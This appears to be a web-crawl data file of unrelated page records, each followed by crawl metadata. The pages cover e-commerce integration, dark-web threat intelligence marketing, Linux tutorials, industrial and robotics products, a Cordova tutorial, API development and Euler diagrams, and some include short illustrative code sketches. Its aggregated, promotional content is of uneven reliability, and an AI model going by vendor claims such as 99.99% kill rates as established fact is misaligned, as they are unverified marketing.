The combination of Chameleon SaaS Shop and Tradebyte represents the optimum solution for online retailers who want to sell their goods simultaneously through multiple channels and want to run their own online shop at minimal expense. By using the unique possibilities of Tradebyte you benefit from a powerful product and process management system to centrally administer an extensive range of goods. The Chameleon interface ensures that the articles captured in Tradebyte are transferred smoothly to your Chameleon online shop. Together with Chameleon SaaS offered by ESONO AG you can set up your own brand store in a short time and with a minimum of initial costs. What makes it even more special is the fact that not only article data, but all transactions are transmitted bidirectionally, which means that all sales and payment processes of your online shop are reported to Tradebyte. In addition, the shop system is in turn notified about shipping or cancellations and sends an automated e-mail to the customer. Combined with one of Chameleon's integrated payment interfaces that supports refunds, such as Payone, this will provide you with a complete package for processing your online business. Key features of the Chameleon-Tradebyte interface Tradebyte specialises in software solutions for vendors and marketplaces, which now want to profit from the “market without limits”. As pioneers of “Networked E-Commerce” the company has concentrated on standardised, cloud-based technologies and comprehensive service since the beginning. At the centre of the application are the software modules especially developed for the management of e-commerce article data (PIM = Product Information Management) and order data (OMS = Order Management System). With TB.One you can comfortably and centrally monitor as many platforms or marketplaces as you like, from Amazon to Zalando. TB.Market is the first standardised software solution, which enables the simple connection of drop shipping suppliers and therefore provides access to the successful platform or market place business. Tradebyte Software GmbH Phone: +49 981 20822-0
systems_science
https://www.pericertum.com/solutions/predict-and-prevent/
2022-08-11T13:56:00
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571472.69/warc/CC-MAIN-20220811133823-20220811163823-00291.warc.gz
0.920003
495
CC-MAIN-2022-33
webtext-fineweb__CC-MAIN-2022-33__0__181711790
en
Prevent Cyber Attacks using Artificial Intelligence Making Darkweb and Deepweb Threat Intelligence Actionable There are thousands of new vulnerabilities disclosed to the public annually – but, knowing the urgency of which ones to patch is a significant challenge for security teams around the globe. Given limited resources, you need to identify and address the most critical ones first. Why? Not all vulnerabilities present the same level of risk. Some are minor, while others can have an extremely high probability of becoming exploited. Identifying the software to patch most urgently can be critical to an organization’s survival. So how can one identify the most dangerous vulnerabilities? Research has shown that hackers use less than 3% of all publicly known vulnerabilities in attacks — yet 99% of breaches are due to known vulnerabilities. Some vulnerabilities are more useful to hackers than others. Those discussed in the dark web, where hackers are planning, buying and selling exploits, have a greater than 31% probability of being weaponized toward an exploit. Our tools leverage automated machine learning to datamine hacking communities within the deep and dark web. The resulting information may be used by our clients to assist in prioritizing remediation efforts to focus on those vulnerabilities which are most relevant to their networks. Focusing on those vulnerabilities currently being used by hackers can proactively improve cybersecurity posture and make it harder for hackers to penetrate. Our technology combines advanced machine learning with automatically mined deep web and dark web information to provide proactive, actionable cyber threat intelligence. This approach is unique in the cybersecurity landscape, rapidly accelerating the collection of data to analyze using machine learning to identify potential threats. Our solutions are designed to empower network defenders with actionable intelligence before cyberattacks occur. Automated capture and analysis of deep and dark web data predict real threats and vulnerabilities with sufficient warning to allow cybersecurity professionals to take advanced corrective action. Our advantage is in our ability to combine dark web data with advanced machine learning. Automation speeds the data collection process and advanced machine learning provides accurate threat assessments. We can determine the most likely threats against your organization now— by scanning the dark web for current or emerging actionable threats and understanding what threat actors are discussing about your company brands, domains, customers, employees, and related information. As a result, your organization will be able to focus on the active threat actors using the right data to accurately predict which vulnerabilities will be exploited — even before the availability of an exploit.
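A heavily simplified, hypothetical sketch of the prioritization idea described above: score each vulnerability with a classifier trained on features such as CVSS score and dark-web chatter, then patch the highest-probability items first. The feature set, CVE identifiers, and training data below are invented purely for illustration and are not the vendor's actual model:

```python
# Hypothetical sketch: rank vulnerabilities by predicted probability of exploitation.
# Features per CVE: [CVSS score, number of dark-web forum mentions, exploit code traded (0/1)]
from sklearn.linear_model import LogisticRegression

X_train = [
    [9.8, 14, 1],   # widely discussed, exploit for sale  -> later weaponized
    [7.5,  0, 0],   # high CVSS but no chatter            -> not weaponized
    [5.3,  6, 1],   # moderate CVSS, active trading       -> later weaponized
    [4.0,  1, 0],
]
y_train = [1, 0, 1, 0]  # toy labels: 1 = exploited in the wild, 0 = not

model = LogisticRegression().fit(X_train, y_train)

# Rank new (made-up) CVEs by predicted exploitation probability, highest first.
candidates = {"CVE-2024-0001": [8.1, 9, 1], "CVE-2024-0002": [9.0, 0, 0]}
ranked = sorted(candidates,
                key=lambda c: model.predict_proba([candidates[c]])[0][1],
                reverse=True)
print(ranked)
```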
systems_science
https://www.imagineshop.co.uk/bookazines/linux-and-open-source-genius-guide-vol-4.html?utm_source=LinuxUser.co.uk&utm_medium=product-widget-sidebar-normal&utm_campaign=New-Product-Widget
2017-02-23T21:02:31
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171232.43/warc/CC-MAIN-20170219104611-00170-ip-10-171-10-108.ec2.internal.warc.gz
0.832535
520
CC-MAIN-2017-09
webtext-fineweb__CC-MAIN-2017-09__0__182893763
en
Linux has proved to be popular among coders, developers and users with the many customisable services and utilities it offers. The recent worldwide success of the Raspberry Pi has increased its popularity even further as young kids and adults alike discover its multiple uses every day. With this book, you'll go from Linux intermediate to Linux expert in no time as we have more than 35 tutorials on everything from programming to coding to building stuff you never thought you could do with your operating system. In this bookazine... The ultimate guide for Linux professionals - Guides to building blogs with Django, mastering LibreOffice, backing up and more. - Step-by-step guides for all Linux users. Pro tips & tricks - From building faster web servers to remote desktoping. - The secrets behind the best distros and projects. - Top 10 distros - Build your own cloud Tips and Tricks Put Cinnamon on your distro Manage boot scripts and startup applications Create shared space for your multi-boot system Create multiple servers with OpenVZ Monitoring your server with tmux Manage your wireless network with Wireshark Protect your network with Snort Build a media converter with Python, Qt and FFmpeg Back up your system with Clonezilla SSH tunnelling on insecure networks Create secure remote backups using Duplicity Create professional presentations with LaTeX Create a powerful static website with nanoc Sync with Google Drive Create a high-performance NAS using GlusterFS Interface a sensor with an Arduino Open source genealogy with Gramps Make a personal wiki with DokuWiki Publish a book with LyX Plan your projects with Gantt and Planner Build a Linux home server Make a Noughts & Crosses game for Raspberry Pi Build a file server with the Raspberry Pi Create a network of Raspberry Pis Get an app on the Raspberry Pi Store Turn your Pi into an internet radio Master Linux with System Administrator Compile your own kernel Design and code a simple game using Python Make web apps with Python Emulate a Bluetooth keyboard with the Raspberry Pi Create a VPN with the Raspberry Pi Build an Android app with open source tools Build extensions for the GNOME desktop environment Speed up your PHP applications with memcached Distro Super Test RSS feed readers Live USB tools File encryption utilities Free with this issue... DVD containing four live distros, tutorial files in the book and essential software
systems_science
https://heat-processing.com/trade-industry/steel-processing-steeltec-relies-on-abp-induction-heating-system/
2021-09-19T03:58:44
s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780056711.62/warc/CC-MAIN-20210919035453-20210919065453-00658.warc.gz
0.921402
391
CC-MAIN-2021-39
webtext-fineweb__CC-MAIN-2021-39__0__242495564
en
02.09.2021. Steeltec from Emmenbrücke in Switzerland, a member of the Swiss Steel Group, is increasing its flexibility in steel processing. ABP's ESS induction heater for bars will be installed there this summer. Induction bar heating system The ESS induction heating system, which ABP is installing for Steeltec, consists of six coils and has a length of 8 m. The system is equipped with an IGBT multi-converter, which features a total power of 5,400 kW. ABP's IGBT technology stands for the highest efficiency. Its modular design and plug & play modules make the customer extremely flexible. Its zone control makes it possible to change the temperature curve according to different parameters. The induction bar heating system is ideal for a variety of processes, such as continuous bar heating or a batch operation. The ESS type enables easy temperature adjustment to be performed for different steel grades while optimising axial and radial temperature distribution. Driven rollers convey the bars through the induction coils and heat them to rolling temperature. Conveying speed and heater output are continuously adjusted to suit the respective production conditions. Focus on efficiency and sustainability What is special about the ABP development is its focus on efficiency and sustainability. For instance, each zone can be regulated individually and the temperature profile can be adjusted accordingly. The ESS boasts low energy consumption, and the coil design relies on a robust construction and a specially developed copper profile for high electrical efficiency. Thermprof® simulation software is also used to simulate and optimise the temperature curve. The ESS control system can be linked to a Level 2 control system for this purpose. As a result, automation potential can be fully exploited. The ESS control system also offers a wide range of functions to optimally adapt the intermediate heating to the rolling process. (Source: ABP Induction Systems)
systems_science
https://jonbeckett.medium.com/the-accidental-creation-of-the-cloud-9c65f5534d9b
2021-01-20T05:48:51
s3://commoncrawl/crawl-data/CC-MAIN-2021-04/segments/1610703519923.26/warc/CC-MAIN-20210120054203-20210120084203-00616.warc.gz
0.973547
766
CC-MAIN-2021-04
webtext-fineweb__CC-MAIN-2021-04__0__177127752
en
Back in the early 2000s, the financial analysts at Amazon expressed frustration that much of their spare server capacity went unused for the majority of the time. A group of engineers were tasked with exploring how they might sell the use of their servers to others — and thus history lurched forwards — “the cloud” was invented. While Amazon wrestled with their accidental creation, aided and abetted by an army of Web 2.0 application developers, a series of chess moves were happening deep within Microsoft that are still shaping and changing the way we work today. Microsoft had built their business on the sale of licenses for operating systems and office software. Having done battle with IBM, Apple, Lotus, WordPerfect, and WordStar, they reached a curious plateau — where those that needed their software already had it, and the effort (and cost) involved in re-inventing their various wheels increasingly became a game of negative returns. Microsoft desperately needed to change the game, but of course Microsoft is Microsoft. Historically, they have never been innovators — they didn’t invent the disk operating system, the windowed operating system, or even the office applications that made them famous — they copied others, and iterated relentlessly. The technology world watched Amazon with envious eyes — not because Amazon had created a ground-breaking product — but because through re-selling the use of infrastructure, Amazon had lucked into the subscription service model — which soon became divorced entirely from hardware through virtualisation. “Software as a Service” had been born. It took Microsoft the better part of a decade to catch up — not least because the products their customers rely on had never been designed to run as headless services. Entire platforms had to be re-imagined from the ground up — while millions of people were still using them. It doesn’t help that people typically don’t like change. We finally appear to be there though. Microsoft called their new world “Azure”, and after a number of re-inventions and re-imaginings, it is now a mature platform. Azure has become an enormous ecosystem of integrated systems. Its success has become such that there are rumors of the Windows desktop operating system being deprecated entirely: released as a free product, or replaced by a Linux-powered simulacrum — the same sleight of hand Apple performed with OSX. What started perhaps ten years ago as a trickle of early adopters has become an exodus — of corporate server farms moving to the cloud. The math isn’t difficult either — where software as a service requires subscriptions and power users, server farms require architects, administrators, licenses, consultants, specialists, developers, and more — not to mention hardware, disaster recovery plans, and the relentless bleed of depreciating assets. Despite the benefits, many organisations continue to distrust the security and privacy of data stored anywhere outside of infrastructure they own and control. Virtualisation has provided a first step into the new world for many, affording agility in the use of hardware, but at the expense of many of the benefits of the cloud. For the rest, the journey is just beginning — dismantling historic infrastructure, systems, and solutions piece by piece, and migrating them to the new normal. They join a growing community of organisations that were born to the new world — that have never known a server room. It’s a strange thought.
In many ways it’s a privilege to be witness to the world changing — to know the old, and embrace the new — to see such progress, and so many opportunities unfold before us. You can find the original copy of this post (and much more) at jonbeckett.com
systems_science
https://opendatacam.markuskreutzer.com/
2024-04-13T22:00:58
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296816853.44/warc/CC-MAIN-20240413211215-20240414001215-00704.warc.gz
0.893667
144
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__87524810
en
OpenDataCam is an accessible, affordable and transparent solution that enables everyone to quantify movements in urban environments. Besides many other kinds of applications, it can be used to measure the effectiveness of interventions in urban environments. Technically, the tool uses computer vision to quantify and track moving objects. In doing so, it never records any photo or video data and processes everything locally. It features a friendly user interface and is fully documented as an open source project to underline transparency and full disclosure on privacy questions. This site documents the design of its visual identity and user interface as well as strategic considerations.
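As a rough, hypothetical illustration of counting moving objects in video with computer vision, the sketch below uses OpenCV background subtraction on a local video file. It is a toy example of the general idea, not OpenDataCam's actual pipeline, and the filename and thresholds are placeholders:

```python
# Hypothetical sketch: count moving objects per frame with background subtraction.
import cv2

cap = cv2.VideoCapture("street.mp4")          # placeholder local video file
subtractor = cv2.createBackgroundSubtractorMOG2(history=500, varThreshold=25)

while True:
    ok, frame = cap.read()
    if not ok:
        break
    mask = subtractor.apply(frame)
    mask = cv2.threshold(mask, 200, 255, cv2.THRESH_BINARY)[1]   # drop shadow pixels
    contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    moving = [c for c in contours if cv2.contourArea(c) > 500]   # ignore small blobs
    print(f"moving objects in this frame: {len(moving)}")

cap.release()
```

Everything here runs on the local machine and no frames are written to disk, which matches the local-processing emphasis in the text above.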
systems_science
https://www.drwehrhahn.com/application/pavement-measurement/laser-system-for-non-contact-recording-of-road-conditions/
2023-09-23T11:47:32
s3://commoncrawl/crawl-data/CC-MAIN-2023-40/segments/1695233506480.7/warc/CC-MAIN-20230923094750-20230923124750-00258.warc.gz
0.946619
195
CC-MAIN-2023-40
webtext-fineweb__CC-MAIN-2023-40__0__143126780
en
The laser measuring system fitted to a vehicle (truck or mini-van) facilitates the non-contact recording of the following condition parameters at a speed of up to 100 km/h: - cross profile of the road - longitudinal road evenness - texture of the road surface The sensors' high measuring frequency, and the consequently high speed of the measuring vehicle, offer the following advantages: - no obstruction of moving traffic - no need for an additional escorting vehicle - high measuring performance of up to 300 km/day All data measured by the sensors are centrally recorded by a PC in the vehicle and triggered independently of speed via an incremental encoder. The vehicle's position is recorded by a GPS system and allocated to the data. The influence of the vehicle's roll and pitch angles on the measured values is corrected by a GPS-supported gyroscopic system. The laser sensors are designed in such a way that they can also measure on wet roads.
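The roll- and pitch-angle correction mentioned above can be illustrated with a simple, hypothetical geometric sketch: a range measured along a tilted, nominally vertical sensor axis is projected onto the true vertical. The real system's correction algorithm is not described in the text, so the function below is an assumption made for illustration only:

```python
# Hypothetical sketch: correct a laser range measurement for vehicle roll and pitch.
import math

def vertical_height(measured_range_m, roll_deg, pitch_deg):
    """Project a downward-looking laser range onto the true vertical.

    Assumes the sensor axis is nominally vertical and tilts with the vehicle body,
    so the vertical component is range * cos(roll) * cos(pitch).
    """
    roll = math.radians(roll_deg)
    pitch = math.radians(pitch_deg)
    return measured_range_m * math.cos(roll) * math.cos(pitch)

# A 2.0 m reading taken while the vehicle rolls 3 degrees and pitches 1.5 degrees:
print(vertical_height(2.0, 3.0, 1.5))   # slightly less than 2.0 m
```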
systems_science
https://rsvpdesign.co.uk/matrix.html
2023-12-05T18:53:29
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100555.27/warc/CC-MAIN-20231205172745-20231205202745-00836.warc.gz
0.952814
626
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__171688959
en
The Matrix activity offers opportunities to explore the effectiveness of different matrix, cell and linear reporting systems within an internal supply chain. It also offers the chance to model organisational networks and flows of information or resources around them. Individuals within the group try to complete their personal targets for the organisation to achieve its goal according to strict rules on how the supply chain network is set up. Each individual must obtain a series of coloured links in a specific order, but can only network with those who they are physically connected with. Sometimes individuals in organisations & complex networks will need to consider the needs of others as well as their own individual targets, and the same is true in this activity. In Matrix, participants are connected to each other by a series of rope connections from one individual to one or more individuals. The rope connections are the ‘supply chains’ across which they can send and receive resources to complete the personal targets they have been set, and collect the correct coloured resources in the correct order. This activity involves working within a collaborative system in which every individual has a specific target that can only be achieved through co-operation with others. The system has strictly enforced rules that must be followed at all times. Participants attempt to achieve their individual goals, whilst also supporting others within the supply chain in achieving their targets. The activity raises questions about flows of information, channels of communication and organisational structures. As a versatile & flexible activity, it offers opportunities to explore the effectiveness of different matrix, cell and linear reporting systems. How to run the activity: Working in a group, up to 16 participants are placed in a supply chain network in which each person has physical connections via extended cords on belts to other people in the network. Within the system are coloured links, representing resources or pieces of information that must be moved around the network via the existing cord connections. Each individual participant has a target card which illustrates a sequence of coloured links to be collected. There are strict rules about how and when the links can be moved. The aim of the exercise is to ensure that the resources / information within the network are managed effectively and efficiently so that every person involved can meet their individual target. Upon completion of an individual target, the individual concerned is removed from the network and the links attached to that belt are removed. Essentially, removing the individual from the supply chain network. Planning for individual completion and exit from the system is important, to ensure that the achievement of individual targets does not compromise the ability of the wider organisation to succeed. Package Weight: 1.8kg Product prices shown do not include delivery costs We use international and local courier services to provide a fast, secure and traceable shipping service to our customers. Typically we will ship within one working day of receiving your order (if received by 14.00 local time), and your goods should be with you wherever you are in the world within one week! We provide a 12 month unconditional guarantee. If you have any problems with our materials, we will replace any defective parts, or you can return the product for a refund.
systems_science
https://threeuv.com/product/roveruv/
2021-10-27T00:32:15
s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323587963.12/warc/CC-MAIN-20211026231833-20211027021833-00613.warc.gz
0.828813
282
CC-MAIN-2021-43
webtext-fineweb__CC-MAIN-2021-43__0__283783636
en
Introducing Rover, the first fully autonomous UV-C mobile disinfection robot manufactured in the USA. Unlike manual approaches to disinfection, the UV-C light atop the autonomous mobile robot provides rapid, hands-free, effective inactivation of harmful microorganisms found in the air and on surfaces. Rover kills 99.99% of Covid-19 pathogens and can disinfect over 18,000 sq feet on a single charge without any human interaction. Intelligent sensors enable the robot to avoid obstacles, yet perform safely. Data is made available to track Rover’s runtime, location and disinfection history. Use Rover to regularly disinfect large spaces, and remove the need for expensive chemical cleaning solutions. Equipped with 1140 watts of UV-C, killing 99.99% of Covid-19 pathogens Runs pre-mapped routes reporting disinfection data in real time Built-in sensors detect any human movement, ensuring safety of staff - Kills 99.99% of Covid-19 pathogens - Disinfects over 18,000 sq ft on a single run cycle - Intelligent safety sensors ensure no risk to humans - Fully autonomous, runs pre-programmed routes - Reports real time disinfection data to the cloud - Manufactured in the USA - 1 year warranty - Dimensions 78″ x 24″ x 36″ – Weight 350 lbs
systems_science
https://ccoenraets.github.io/cordova-tutorial/data-storage.html
2023-03-28T08:24:51
s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948817.15/warc/CC-MAIN-20230328073515-20230328103515-00192.warc.gz
0.87309
423
CC-MAIN-2023-14
webtext-fineweb__CC-MAIN-2023-14__0__120637654
en
Open the files under www/js/services and explore the different persistence services. The application is initially configured to work with the in-memory datastore.
To change the local persistence mechanism for the application:
- In index.html, instead of js/services/memory/EmployeeService.js, import the .js file for the service of your choice, for example js/services/websql/EmployeeService.js.
- Test the application.
To test the JSON service, make sure the Node.js server provided as part of the materials is running:
- Open a terminal or command window, and navigate to the server directory under cordova-tutorial.
- Install the server dependencies.
- Start the server.
The server implements CORS (Cross-Origin Resource Sharing) to support cross-site HTTP requests, so you can invoke the services from a file loaded from another domain or from the file system. Since services/json/EmployeeService.js points to localhost, this will only work when running the application in the browser on your computer, and not on your device, because the device does not resolve "localhost" to your computer. To make the JSON service work when running the application on your device, make sure your computer and device are on the same subnet, identify the IP address of your computer, and replace localhost with that IP address in services/json/EmployeeService.js. As an alternative, you could also deploy the service on a publicly available server. In a real-life application, you would typically externalize the host name in some sort of configuration file. All the other data storage services provided in www/js/services work out of the box when running the application in the browser and on device.
systems_science
https://chipgenius.en.lo4d.com/windows
2019-12-11T18:48:11
s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575540532624.3/warc/CC-MAIN-20191211184309-20191211212309-00292.warc.gz
0.900156
333
CC-MAIN-2019-51
webtext-fineweb__CC-MAIN-2019-51__0__115504186
en
ChipGenius is a small and portable application which can quickly extract information from connected USB devices on a PC. The application can be useful in diagnosing issues connected with broken USB flash drives; it can access devices even if they are not visible in Windows' device explorer. All that is required to use ChipGenius is to make sure that the USB devices in question have been connected to the computer. The main interface will display the device description, processing speed, ID data and the device serial number. ChipGenius can be handy in extracting particulars of a USB drive such as the chip vendor and specific part numbers. So whether you're looking to troubleshoot a defective flash drive or a USB keyboard, ChipGenius can be a handy application to extract details that Windows cannot. This download is licensed as freeware for the Windows (32-bit and 64-bit) operating system on a laptop or desktop PC, in the hardware diagnostic software category, without restrictions. ChipGenius 4.19.0319 is available to all software users as a free download; it runs on Windows 10 PCs and also without a hitch on Windows 7 and Windows 8. Compatibility with this USB device information software may vary, but it will generally run fine under Microsoft Windows 10, Windows 8, Windows 8.1, Windows 7, Windows Vista and Windows XP on either a 32-bit or 64-bit setup. A separate x64 version may be available from hit00. We have tested ChipGenius 4.19.0319 against malware with several different programs. Please review the test results. We have not certified this program as clean.
systems_science
https://worduser01.wordpress.com/2018/07/12/dod-it-efforts-focus-on-warfighter-competitive-edge-cio-says/
2019-02-23T22:58:47
s3://commoncrawl/crawl-data/CC-MAIN-2019-09/segments/1550249556231.85/warc/CC-MAIN-20190223223440-20190224005440-00511.warc.gz
0.862295
114
CC-MAIN-2019-09
webtext-fineweb__CC-MAIN-2019-09__0__40611879
en
DoD IT Efforts Focus on Warfighter, Competitive Edge, CIO Says By Lisa Ferdinando Today’s warfighter needs access to intelligence and communication to enable quick decision-making and maintain a competitive edge, and the Defense Department’s information technology efforts are focused on maintaining this edge and supporting national defense priorities, DoD’s chief information officer said. Published July 11, 2018 at 12:49PM Read more at https://defense.gov from Blogger https://ift.tt/2NITTOF
systems_science
https://regatron.com.au/unlocking-the-potential-of-dual-dc-power-supplies-versatility-and-efficiency-unleashed/
2024-04-15T19:00:44
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817014.15/warc/CC-MAIN-20240415174104-20240415204104-00672.warc.gz
0.904442
278
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__114904671
en
Dual DC power supplies stand as invaluable assets in the realm of electronics, providing a multitude of output voltages concurrently and thereby offering unparalleled flexibility in powering electronic circuits. Their unique capability to furnish both positive and negative voltages renders them particularly well-suited for applications necessitating bipolar voltage rails. Equipped with dedicated voltage regulators and isolation circuitry, dual DC power supplies guarantee precise regulation and stability in output voltages. This steadfast reliability serves as a bulwark against voltage fluctuations, safeguarding sensitive electronic components from potential damage and ensuring the consistent operation of electronic systems. Characterised by their compact and lightweight design, dual DC power supplies exemplify efficiency in space utilisation and integration into electronic systems. Their diminutive footprint not only conserves valuable space but also streamlines the integration process, facilitating seamless incorporation into diverse electronic setups. Furthermore, the independent control afforded to each output voltage empowers users with the ability to manage power distribution efficiently. This autonomy facilitates optimised power consumption and performance, enhancing the overall efficiency and functionality of electronic systems. In essence, dual DC power supplies epitomise versatility and efficiency, emerging as indispensable components across a spectrum of electronic applications. Their ability to deliver precise and stable power outputs, coupled with their compact design and efficient power management capabilities, positions them as cornerstone elements in modern electronic systems, underscoring their indispensable nature in powering various electronic devices and circuits.
systems_science
https://shreegajananinfotech.in/service?service=api_development
2024-04-21T09:18:15
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817729.87/warc/CC-MAIN-20240421071342-20240421101342-00539.warc.gz
0.97005
136
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__3274666
en
API development is the process of creating application programming interfaces (APIs) that allow different software systems to communicate and exchange data with each other. APIs are essentially sets of rules and protocols that define how two or more systems can interact with each other. They enable developers to build applications that can integrate with other systems and access their functionality and data. API development typically involves several steps, such as planning and design, implementation, testing, and deployment. It may also involve working with various technologies and platforms, such as REST and SOAP, as well as security and authentication protocols. APIs are widely used in various industries, such as e-commerce, finance, healthcare, and social media.
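To make the idea concrete, here is a minimal sketch of the kind of interface API development produces. It uses Python's Flask framework purely as an example; the resource name, fields and port are made up for illustration and are not tied to any particular project.

```python
# Minimal REST-style API sketch using Flask (illustrative resource and fields only).
from flask import Flask, jsonify, request

app = Flask(__name__)
orders = {}          # in-memory store standing in for a real database
next_id = 1

@app.route("/orders", methods=["GET"])
def list_orders():
    # Any other system can integrate with ours simply by calling this endpoint.
    return jsonify(list(orders.values()))

@app.route("/orders", methods=["POST"])
def create_order():
    global next_id
    payload = request.get_json(force=True)       # the agreed exchange format is JSON
    order = {"id": next_id, "item": payload["item"], "qty": payload.get("qty", 1)}
    orders[next_id] = order
    next_id += 1
    return jsonify(order), 201                   # 201 Created, per REST convention

if __name__ == "__main__":
    app.run(port=5000)
```

The "rules and protocols" the paragraph refers to are exactly what this sketch pins down: the URL, the HTTP method, the JSON fields and the status codes that a client in any language can rely on.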
systems_science
https://niyamaklogic.wordpress.com/reference-work-on-logic-and-logicians/understanding-euler-diagrammes-and-venn-diagrammes/
2017-03-28T21:28:14
s3://commoncrawl/crawl-data/CC-MAIN-2017-13/segments/1490218189903.83/warc/CC-MAIN-20170322212949-00026-ip-10-233-31-227.ec2.internal.warc.gz
0.923277
1,670
CC-MAIN-2017-13
webtext-fineweb__CC-MAIN-2017-13__0__108121634
en
1. What are Euler Diagrams?
Leonhard Euler (pronounced “Oiler”) was one of the greatest mathematicians of all time. Many people claim he was the greatest. One of his lesser known inventions is Euler diagrams, which he used to illustrate reasoning. An Euler diagram is shown above. One of the common interpretations of Euler diagrams is that of set intersection. With this interpretation, the above diagram uses areas to represent sets A, B and C. The diagram also includes areas for the intersections A∩B, A∩C, and A∩B∩C. No area represents the set (not A)∩C, and so the set C is entirely contained in A. Visually, Euler diagrams consist of contours, drawn as simple closed curves. The contours split the plane into zones. A zone can be identified by its containing contours. In the diagram above, the contours are labelled A, B and C and the zones A, B, AB, AC and ABC are present in the diagram (as well as the outside zone which is contained in no contours). Here we associate with each zone a label formed from the contours within which it is contained. This section shows a few examples of where Euler diagrams can be used. Often, Euler diagrams are augmented with extra structures, such as dots, labels or graphs, showing information about what is contained in the various zones. One significant feature of Euler diagrams is their capacity to visualize complex hierarchies. Above is a picture indicating that some animals are in more than one classification, such as “dog” and “cat” which are both pets and mammals. It is not easy to show this sort of relationship with the more usual tree-based hierarchical visualization of classifications. VENNFS takes this Euler diagram approach to visualizing file system organization. It allows files to appear in more than one directory in a computer file system. Other researchers propose using Euler diagrams to visualize large databases using multiple classifications. The original application of Euler diagrams, as a way of diagrammatically demonstrating logic, is widely used in schools, where they are a great aid to teaching set theory. More academic work includes Hammer, who introduced a sound and complete logical system based on Euler diagrams. More expressive reasoning can be achieved by extending the diagrams with graphs. Shin developed the first such formal system. This was extended to Spider and Constraint diagrams by the Visual Modelling Group at the University of Brighton, along with others. An example constraint diagram is shown above. These enhanced Euler diagrams can be seen as hypergraphs, and as such, it should be possible to apply visualization techniques for enhanced Euler diagrams more generally to applications that use hypergraphs.
Generating Euler Diagrams
Much of the recent research has looked at embedding Euler diagrams in the plane from a textual description of the zones that should appear in the diagram. This work is made more interesting by the presence of wellformedness conditions. Wellformedness restricts the appearance of Euler diagrams, and so to some extent, the more wellformed, the better the comprehension of the diagram. However, some Euler diagrams are not drawable under some wellformedness conditions. Common wellformedness conditions are:
- The shape of contours may be restricted to certain shapes, such as circular, oval, rectangular or convex shapes.
- Triple points may not be allowed, so that only two contours can intersect at any given point.
- Only transverse contour intersections may be allowed, so that lines cannot touch without crossing.
- Concurrent contours may not be allowed, so a line segment cannot represent the border of 2 or more contours.
- Disconnected zones may not be allowed, so that zones cannot appear more than once in a diagram.
- Contours should be simple curves, so that contours that cross themselves are not allowed.
Relaxing these restrictions allows all Euler diagrams to be drawn. Euler himself only drew diagrams with circles, without breaking any of the wellformedness conditions.1
Difference between Euler and Venn Diagrams
Euler diagrams or Euler circles are a diagrammatic means of representing sets and their relationships. They are the modern incarnation of Euler circles, which were invented by Leonhard Euler in the 18th century. Euler diagrams usually consist of simple closed curves in the plane which are used to depict sets. The spatial relationships between the curves (overlap, containment or neither) correspond to set-theoretic relationships (intersection, subset and disjointness). Euler diagrams differ from the well-known Venn diagrams, which represent all possible set intersections available with the given sets. The intersection of the interior of a collection of curves and the exterior of the rest of the curves in the diagram is called a zone. Thus, in Venn diagrams all zones must be present (given the set of curves), but in an Euler diagram some zones might be missing. In a logical setting, one can use model-theoretic semantics to interpret Euler diagrams, within a universe of discourse. In the examples on the right, the Euler diagram depicts that the sets Animal and Mineral are disjoint since the corresponding curves are disjoint, and also that the set Four Legs is a subset of the set of Animals. The Venn diagram which uses the same categories of Animal, Mineral and Four Legs does not encapsulate these relationships. Traditionally, the emptiness of a set in Venn diagrams is depicted by shading in the region. Euler diagrams represent emptiness either by shading or by the use of a missing zone. Often a set of well-formedness conditions is imposed; these are topological or geometric constraints imposed on the structure of the diagram. For example, connectedness of zones might be enforced, or concurrency of curves or multiple points might be banned, as might tangential intersection of curves. In the diagram below, examples of small Venn diagrams are transformed into Euler diagrams by sequences of transformations; some of the intermediate diagrams have concurrency of curves. However, this sort of transformation of a Venn diagram with shading into an Euler diagram without shading is not always possible. There are examples of Euler diagrams with 9 sets which are not drawable using simple closed curves without the creation of unwanted zones, since they would have to have non-planar dual graphs.2
Venn Diagrams, Euler Diagrams and Leibniz
The terms Euler diagram and Venn diagram are often confused. Venn diagrams can be seen as a special case of Euler diagrams, as Venn diagrams must contain all possible zones, whereas Euler diagrams can contain a subset of all possible zones. In Venn diagrams a shaded zone represents an empty set, whereas in an Euler diagram the corresponding zone could be missing from the diagram. This means that as the number of contours increases, Euler diagrams are typically less visually complex than the equivalent Venn diagram, particularly if the number of non-empty intersections is small.
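The distinction can be made concrete with a short sketch: given the sets, list every possible zone and note which ones are empty. A Venn diagram must still draw (and shade) the empty zones; an Euler diagram may simply omit them. The sketch below is an abstract illustration in Python, not a drawing algorithm, and the example sets are the Animal, Mineral and Four Legs categories used above.

```python
from itertools import combinations

def zones(named_sets):
    """Abstract zones of an Euler diagram: for each combination of contours,
    the elements inside exactly those contours and inside no others."""
    names = sorted(named_sets)
    result = {}
    for r in range(1, len(names) + 1):
        for combo in combinations(names, r):
            inside = set.intersection(*(named_sets[n] for n in combo))
            others = [named_sets[n] for n in names if n not in combo]
            outside = set().union(*others) if others else set()
            result["".join(combo)] = inside - outside
    return result

example = {"Animal": {"dog", "cat", "snake"},
           "FourLegs": {"dog", "cat"},      # every four-legged thing here is an animal
           "Mineral": {"quartz"}}

for label, members in zones(example).items():
    status = "present" if members else "empty (may be omitted in an Euler diagram)"
    print(f"{label:24s} {status}")
```

With three contours there are seven possible zones; here only three are non-empty, which is why the Euler diagram of this example is so much simpler than the corresponding Venn diagram.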
Baron notes that Leibniz produced similar diagrams before Euler; however, much of this work was unpublished. She also observes even earlier Euler-like diagrams by Ramon Lull in the 13th Century.3
References:
